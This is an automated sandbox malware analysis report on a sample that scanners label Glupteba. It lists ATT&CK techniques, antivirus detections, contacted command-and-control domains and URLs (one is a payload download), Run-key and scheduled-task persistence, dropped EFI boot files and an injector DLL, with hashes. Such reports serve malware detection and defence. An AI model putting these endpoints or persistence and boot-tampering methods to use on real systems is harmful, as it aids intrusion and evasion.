            Source: Yara match File source: 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.426639210.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 21 | Windows Service 1 | Windows Service 1 | Disable or Modify Tools 2 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
            Default Accounts | Command and Scripting Interpreter 2 | Scheduled Task/Job 1 | Process Injection 112 | Obfuscated Files or Information 1 | Input Capture 1 | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Scheduled Task/Job 1 | Registry Run Keys / Startup Folder 11 | Scheduled Task/Job 1 | Software Packing 11 | Security Account Manager | System Information Discovery 54 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | Service Execution 1 | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Masquerading 33 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 25 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 4 | LSA Secrets | Security Software Discovery 261 | SSH | Keylogging | Data Transfer Size Limits | Proxy 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 112 | Cached Domain Credentials | Virtualization/Sandbox Evasion 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Process Discovery 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Figure: behavior graph. Behavior Graph ID: 506223, Sample: f6oNLRKHUy.exe, Startdate: 20/10/2021, Architecture: WINDOWS, Score: 100]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            f6oNLRKHUy.exe | 31% | Metadefender |
            f6oNLRKHUy.exe | 52% | ReversingLabs | Win32.Hacktool.PowerSploit
            f6oNLRKHUy.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Windows\rss\csrss.exe | 100% | Joe Sandbox ML |
            B:\EFI\Boot\old.efi (copy) | 0% | ReversingLabs |
            B:\EFI\Microsoft\Boot\fw.efi (copy) | 0% | ReversingLabs |
            C:\EFI\Boot\EfiGuardDxe.efi | 0% | ReversingLabs |
            C:\EFI\Boot\bootx64.efi | 0% | ReversingLabs |
            C:\EFI\Microsoft\Boot\bootmgfw.efi | 0% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 46% | Metadefender |
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 59% | ReversingLabs | Win64.Trojan.Glupject
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 14% | Metadefender |
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 73% | ReversingLabs | Win64.Trojan.Glupteba
            C:\Windows\rss\csrss.exe | 31% | Metadefender |
            C:\Windows\rss\csrss.exe | 52% | ReversingLabs | Win32.Hacktool.PowerSploit
            C:\Windows\windefender.exe | 29% | Metadefender |
            C:\Windows\windefender.exe | 57% | ReversingLabs | Win32.Trojan.WinGoRanumBot

            Unpacked PE Files

            Source | Detection | Scanner | Label
            1.0.f6oNLRKHUy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            31.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            38.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            3.2.f6oNLRKHUy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            8.2.csrss.exe.11c06000.10.unpack | 100% | Avira | TR/Patched.Ren.Gen
            16.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.f6oNLRKHUy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            42.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            8.2.csrss.exe.11b86000.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
            31.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            8.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            16.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            37.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            42.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            27.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            24.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            3.0.f6oNLRKHUy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            27.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            38.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            8.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            37.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            24.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| runmodes.com | 104.21.34.203 | true | false | | high |
| server12.trumops.com | 104.21.79.9 | true | false | | high |
| gohnot.com | 104.21.92.165 | true | false | | high |
| 8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com | unknown | unknown | false | | high |
| trumops.com | unknown | unknown | false | | high |
| logs.trumops.com | unknown | unknown | false | | high |
| e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | unknown | unknown | false | | high |

Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 | true | Avira URL Cloud: malware | unknown |
| https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 | true | Avira URL Cloud: malware | unknown |
| https://runmodes.com/api/log | false | Avira URL Cloud: safe | unknown |
| http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe | true | Avira URL Cloud: malware | unknown |
| https://server12.trumops.com/api/poll | true | Avira URL Cloud: malware | unknown |

                          URLs from Memory and Binaries


                                                            Contacted IPs


Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 172.67.139.144 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 104.21.34.203 | runmodes.com | United States | 13335 | CLOUDFLARENETUS | false |
| 104.21.92.165 | gohnot.com | United States | 13335 | CLOUDFLARENETUS | false |
| 104.21.79.9 | server12.trumops.com | United States | 13335 | CLOUDFLARENETUS | false |

                                                            Private

                                                            IP
                                                            192.168.2.1
                                                            127.0.0.1

                                                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 506223
Start date: 20.10.2021
Start time: 12:37:41
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: f6oNLRKHUy.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 54
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@51/17@13/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 98.7% (good quality ratio 80.1%)
• Quality average: 58.5%
• Quality standard deviation: 36.8%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.203.67.116, 93.184.220.29, 20.199.120.85, 20.82.210.154, 20.199.120.151, 40.112.88.60, 20.54.110.249, 80.67.82.235, 80.67.82.211, 20.198.162.76, 23.211.4.86
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, wns.notify.trafficmanager.net, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/506223/sample/f6oNLRKHUy.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            Time      Type             Description
                                                            12:38:43  API Interceptor  10x Sleep call for process: f6oNLRKHUy.exe modified
                                                            12:38:51  API Interceptor  17x Sleep call for process: csrss.exe modified
                                                            12:38:54  Task Scheduler   Run new task: csrss path: C:\Windows\rss\csrss.exe
                                                            12:38:54  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterfly "C:\Windows\rss\csrss.exe"
                                                            12:39:03  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterfly "C:\Windows\rss\csrss.exe"
                                                            12:39:45  API Interceptor  12x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            B:\EFI\Boot\old.efi (copy)
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            C:\EFI\Boot\EfiGuardDxe.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):279552
                                                            Entropy (8bit):4.553173975914215
                                                            Encrypted:false
                                                            SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                            MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                            SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                            SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                            SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            C:\EFI\Boot\bootx64.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:MPEG-4 LOAS
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.2485933233242723
                                                            Encrypted:false
                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4f:BJiRdwfu2SRU4f
                                                            MD5:07615433588EBEE9C0EF1027A51F61CB
                                                            SHA1:47B93A89471B30C4FA9A34AF1181ECB61876E41A
                                                            SHA-256:7E48AD33CB546AA9D70CD832C877BC7F4B4699F61C51AC51B5D55DD5641C0125
                                                            SHA-512:383FFECDB3CF8704B94A4ACBCC922CA416DEA2A36FEED7465B2605E50DDF84F49B11E8D276B99C1E2B4E8BA1179A5496EC2C716CB986BA0758449451B08F0E04
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0xc3a95437, page size 16384, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):786432
                                                            Entropy (8bit):0.2506862368590837
                                                            Encrypted:false
                                                            SSDEEP:384:p3q+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                                                            MD5:AB4C8C258C77F63C675361C81009DD0B
                                                            SHA1:79387D7F6E3C775DC04DCDB3F3D4826E28F5DBE3
                                                            SHA-256:39E771EA9B9C67F01DBF3BD5C46437EEA59AA6341C430C482D3CEBF1718019D1
                                                            SHA-512:CAC57FB9B745A4ED08C60EEB53C54D4B1D8FC5EB3A2316FD17928454E0E70F095DCB2784322B99A66EE36E6F18DC0B61AC3B71C3E037E66562C6157332E890E3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.0776966419796808
                                                            Encrypted:false
                                                            SSDEEP:3:uc/7EvnkyQkl/bJdAtieRihXlall3Vkttlmlnl:3/iLt4bEA3
                                                            MD5:3A0A226FFB9E5BE7BE668ED66AFEAF36
                                                            SHA1:10439E2CF5D2C368A3711FDEFF3164EFA242D19D
                                                            SHA-256:0810F8E71E52D270F45786735674058F991373149449DA076D7A547CAD8BF126
                                                            SHA-512:6ADA4A00E37EBFBCE104FE45F53DB2B3E02782DCA87D1223F1704118F4722DD97896049ED866432E2D3BBB86C37731CAC36A9F2A05238482723FEA0861AB5523
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):101376
                                                            Entropy (8bit):5.951577458824018
                                                            Encrypted:false
                                                            SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                            MD5:09031A062610D77D685C9934318B4170
                                                            SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                            SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                            SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 59%
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):6.31266455792162
                                                            Encrypted:false
                                                            SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                            MD5:D98E33B66343E7C96158444127A117F6
                                                            SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                            SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                            SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 14%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                            Reputation:unknown
                                                            C:\Windows\Logs\CBS\CBS.log
                                                            Process:C:\Windows\servicing\TrustedInstaller.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):3080192
                                                            Entropy (8bit):5.316708989576846
                                                            Encrypted:false
                                                            SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqNm:TL1dq
                                                            MD5:E6BE1FA098CCCCD94DF2823F5A056397
                                                            SHA1:B3E04FEADEF53A0331FD041403E5ADE78B8F782C
                                                            SHA-256:A28D3DC5620840981E7FF8CA995A76AB9B38F131B882C46AF066764A996896E3
                                                            SHA-512:7C1D4FCEE4EA4081F9D87AE04B43B0BC8D32931C01435023791C593B36DA9AE0E5B2E7C3750BAFD1FAC863583FAB7F0CC9E32FB7CC5ABC277E5CB9F1018B4C23
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                            C:\Windows\rss\csrss.exe
                                                            Process:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                            Category:dropped
                                                            Size (bytes):3788288
                                                            Entropy (8bit):7.892618389779633
                                                            Encrypted:false
                                                            SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                            MD5:3C3046F640F7825C720849AAA809C963
                                                            SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                            SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                            SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Metadefender, Detection: 31%
                                                            • Antivirus: ReversingLabs, Detection: 52%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                            C:\Windows\windefender.exe
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                            Category:dropped
                                                            Size (bytes):2102272
                                                            Entropy (8bit):7.879347868736008
                                                            Encrypted:false
                                                            SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                            MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                            SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                            SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 29%
                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                            \Device\Null
                                                            Process:C:\Windows\SysWOW64\sc.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39
                                                            Entropy (8bit):3.964228182058903
                                                            Encrypted:false
                                                            SSDEEP:3:fxjRCqjv:ZMc
                                                            MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
